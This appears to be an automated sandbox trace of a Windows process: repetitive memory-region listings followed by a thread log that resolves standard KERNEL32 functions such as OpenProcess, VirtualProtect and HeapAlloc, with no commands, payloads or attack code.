0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 22291 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 22292 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 22293 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 22294 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 22295 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 22301 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 22302 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 22303 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 22304 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 22305 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 22469 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 22470 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 22471 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 22472 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 22473 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 22505 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 22506 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 22507 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 22508 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 22509 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 22606 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 22607 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 22608 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 22609 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 22610 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 22623 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 22624 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 22625 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 22626 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 22627 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 22697 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 22698 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 22699 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 22700 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 22701 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 22719 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 22720 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 22721 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 22722 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 22723 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 22816 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 22817 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 22818 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 22819 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 22820 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 22886 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 22887 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 22888 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 22945 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 22946 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 23017 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 23018 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 23019 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 23020 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 23021 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 23037 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 23038 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 23039 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 23040 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 23041 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 23559 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 23560 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 23561 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 23562 start_va = 0x2b0000 end_va = 0x2c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 23563 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 23570 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 23571 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 23572 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 23573 start_va = 0x2b0000 end_va = 0x2c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 23574 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 23668 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 23669 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 23670 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 23671 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 23672 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 23678 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 23679 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 23680 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 23681 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 23682 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 23867 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 23868 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 23869 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 23870 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 23871 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 23911 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 23912 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 23913 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 23914 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 23915 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24004 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24005 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24006 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24007 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24008 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24014 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24015 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24016 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24017 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24018 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24093 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24094 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24095 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24096 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24097 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24111 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24112 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24113 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24114 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24115 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24270 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24271 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24272 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24273 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24274 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24275 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24276 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24277 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24278 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24279 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24290 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24291 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24292 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24293 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24294 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24295 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24296 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24297 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24298 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24299 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24385 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24386 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24387 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24388 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24389 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24390 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24391 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24392 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24393 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24394 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24505 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24506 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24507 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24508 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24509 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24511 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24512 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24513 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24514 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24515 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24616 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24617 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24618 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24619 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24620 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24621 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24622 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24623 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24624 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24625 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24717 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24718 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24719 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24720 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24721 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24722 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24723 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24724 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24725 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24726 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24835 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24836 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24837 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24838 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24839 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Thread: id = 34 os_tid = 0xc18 [0099.581] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0099.581] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0099.581] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQueryEx") returned 0x76944e42 [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="VerSetConditionMask") returned 0x77253030 [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="VerifyVersionInfoW") returned 0x76950e91 [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="SuspendThread") returned 0x76970ca9 [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="SizeofResource") returned 0x76953e7f [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="SetFilePointer") returned 0x7695db36 [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="SetEndOfFile") returned 0x76952319 [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="ResetEvent") returned 0x7695bcb4 [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseMutex") returned 0x7695ba72 [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceFrequency") returned 0x769522a7 [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="OpenProcess") returned 0x769559d7 [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 0x7696992d [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="LockResource") returned 0x7694fd29 [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="LoadResource") returned 0x7695984d [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryW") returned 0x76963c01 [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="HeapDestroy") returned 0x76952301 [0099.584] GetProcAddress (hModule=0x76910000, lpProcName="HeapCreate") returned 0x76963ea2 [0099.584] GetProcAddress (hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 